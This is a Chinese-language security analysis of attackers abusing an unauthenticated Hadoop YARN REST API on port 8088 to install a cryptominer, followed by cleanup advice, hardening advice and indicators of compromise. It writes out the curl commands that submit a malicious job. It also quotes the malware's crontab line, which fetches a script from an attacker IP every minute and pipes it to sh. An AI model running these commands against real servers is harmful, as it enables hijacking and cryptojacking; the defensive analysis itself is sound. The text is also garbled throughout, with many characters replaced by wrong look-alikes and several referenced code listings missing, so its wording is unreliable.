Hadoop Yarn REST API未受权漏洞利用挖矿分析

欢迎你们前往腾讯云+社区，获取更多腾讯海量技术实践干货哦~

1、背景状况

5月5日腾讯云安全曾针对攻击者利用Hadoop Yarn资源管理系统REST API未受权漏洞对服务器进行攻击，攻击者能够在未受权的状况下远程执行代码的安全问题进行预警，在预警的先后咱们曾屡次捕获相关的攻击案例，其中就包含利用该问题进行挖矿，咱们针对其中一个案例进行分析并提供响应的安全建议和解决方案。

2、 漏洞说明

Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要做用是实现集群资源的统一管理和调度，能够把MapReduce计算框架做为一个应用程序运行在YARN系统之上，经过YARN来管理资源。简单的说，用户能够向YARN提交特定应用程序进行执行，其中就容许执行相关包含系统命令。

YARN提供有默认开放在8088和8090的REST API（默认前者）容许用户直接经过API进行相关的应用建立、任务提交执行等操做，若是配置不当，REST API将会开放在公网致使未受权访问的问题，那么任何黑客则就都可利用其进行远程命令执行，从而进行挖矿等行为。

攻击步骤：

1. 申请新的application

直接经过curl进行POST请求

curl -v -X POST

'http://ip:8088/ws/v1/cluster/apps/new-application'

返回内容相似于：

2. 构造并提交任务

构造json文件1.json，内容以下，其中application-id对应上面获得的id，命令内容为尝试在/var/tmp目录下建立11112222_test_111122222文件，内容也为111：

而后直接

curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type:application/json'

http://ip:8088/ws/v1/cluster/apps --data-binary @1.json

便可完成攻击，命令被执行，在相应目录下能够看到生成了对应文件

更多漏洞详情能够参考

http://bbs.qcloud.com/thread-50090-1-1.html

3、入侵分析

在本次分析的案例中，受害机器部署有Hadoop YARN，而且存在未受权访问的安全问题，黑客直接利用开放在8088的REST API提交执行命令，来实如今服务器内下载执行.sh脚本，从而再进一步下载启动挖矿程序达到挖矿的目的。

整个利用过程相对比较简单，经过捕捉Hadoop 的launch_container.sh执行脚本，咱们能够看到其中一个案例中相关任务执行的命令：

能够很明显的看到第8行位置，从185.222.210.59下载并执行了一个名为x_wcr.sh的脚本。

在实际过程当中，咱们从多个案例捕获了多个好比名为cr.sh的不一样脚本，但实际的功能代码都差很少，咱们对其中一个x_wcr.sh脚本进行分析，代码自上而下内容：

这部分代码主要针对已存在的挖矿进程、文件进行清理。

这部分的代码主要是判断若是/tmp/java是一个存在而且可写的文件，那么就判断其MD5值是否匹配，MD5不匹配则根据w.conf关键词查找并kill进程；若是非可写的文件，则从新赋值DIR变量，这个变量主要用于后面部分代码中下载挖矿等程序存放目录。

而后接着是一些变量的赋值，包括再次判断若是/tmp/java是一个目录，则从新赋值DIR变量；判断curl和wget命令是否存在，存在则赋值到WGET变量；f2则是赋值为某个IP，实则为是后续下载相关文件的服务器之一。

这部分代码是其中比较核心的代码，经过downloadIfNeed方法下载挖矿程序到DIR目录下并重命名为java，下载w.conf配置文件，给挖矿程序增长执行权限，而后以nohup命令后台运行挖矿程序并删除配置文件；接着检查crontab中的任务，若是不存在对应的任务，就将下载执行脚本的任务"* * * * * $LDR http://185.222.210.59/cr.sh | sh > /dev/null 2>&1"添加到其中,这里LDR为wget -q -O -或者curl，任务每分钟执行一次。

脚本中还包含了几个嵌套调用的download方法，入口方法是downloadIfNeed：

这个方法的核心功能仍是校验已存在的挖矿程序的MD5，若是没法验证或者文件不存在的状况，则直接调用download方法下载挖矿程序；若是文件存在但MD5匹配不正确，则调用download方法后再次验证，验证失败则尝试从另一个下载渠道https://transfer.sh/WoGXx/zzz下载挖矿程序并再次验证。最后还将相关结果上报到目标服务器$f2的re.php.

tmp.txt内容示例：

download方法判断ppc文件的存在与否和 MD5是否匹配，若是不存在或MD5不匹配则调用download2下载，若是存在则复制重名为java。

download2方法则判断系统下载对应版本的挖矿程序，其中http://185.222.210.59/g.php返回的是另一个IP地址；下载成功后则再次验证，并复制重命名为ppc。

在脚本的最后部分还有一些进程、文件、crontab清理的处理，用pkill删除知足条件的进程，删除tmp目录下pscd开头的文件，以及说删除crontab中存在某些关键词的任务。

至此，咱们完成整个脚本的分析，虽然整个脚本比较冗长，并且彷佛各个函数嵌套调用，涉及文件也众多，但其实总体就作了如下几件事：

1.清理相关的进程、文件和crontab任务

2.判断并下载挖矿程序，同时校验MD5值，除了黑客本身控制的服务器，还利用https://transfer.sh提供备用下载，多种方式保障

3.增长脚本下载执行任务添加到crontab里

其实，咱们经过查看YARN的日志文件

yarn-root-nodemanager-master.hadoop.log

也可能看到相应的痕迹：

或者咱们经过管理UI查看application详情：

而crontab的任务日志也能看到相关的执行记录：

最终在/var/tmp目录下也能找到相关的文件

4、安全建议

清理病毒

1.使用top查看进程，kill掉异常进程

2.检查/tmp和/var/tmp目录，删除java、ppc、w.conf等异常文件

3.检查crontab任务列表，删除异常任务

4.排查YARN日志，确认异常的application，删除处理

安全加固

1.经过iptables或者安全组配置访问策略，限制对8088等端口的访问

2.如无必要，不要将接口开放在公网，改成本地或者内网调用

3.升级Hadoop到2.x版本以上，并启用Kerberos认证功能，禁止匿名访问

4.云镜当前已支持该漏洞检测，同时也支持挖矿木马的发现，建议安装云镜并开通专业版，及时发现漏洞并修复或者在中马后能及时收到提醒进行止损

5.更多自检和修复建议能够参考

http://bbs.qcloud.com/thread-50090-1-1.html

5、IOCs

钱包地址

4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

MD5

1.c8c1f2da51fbd0aea60e11a81236c9dc

2.183664ceb9c4d7179d5345249f1ee0c4

3.b00f4bbd82d2f5ec7c8152625684f853

矿池地址

1.158.69.133.20:3333

2.192.99.142.249:3333

3.202.144.193.110:3333

4.46.30.43.159:80

部分相关URL

1. http://185.222.210.59/x_wcr.sh
2. http://185.222.210.59/re.php
3. http://185.222.210.59/g.php
4. http://185.222.210.59/w.conf
5. http://185.222.210.59/cr.sh
6. http://192.99.142.226:8220/w.conf
7. http://192.99.142.226:8220/xm64
8. http://192.99.142.226:8220/cr.sh
9. http://95.142.40.83/xm64
10. http://95.142.40.83/xm32
11. https://transfer.sh/1o3Kj/zzz
12. https://transfer.sh/wbl5H/pscf
13. https://transfer.sh/WoGXx/zzz

---

问答

腾讯云域名安全认证问题？

相关阅读

Linux Redis自动化挖矿感染蠕虫分析及安全建议

黑客是如何实现数据库勒索的 ?

2018云+将来峰会圆桌面对面：以网络安全之能，造国之重器

---

此文已由做者受权腾讯云+社区发布，原文连接：https://cloud.tencent.com/developer/article/1142503?fromSource=waitui

欢迎你们前往腾讯云+社区或关注云加社区微信公众号（QcloudCommunity），第一时间获取更多海量技术实践干货哦~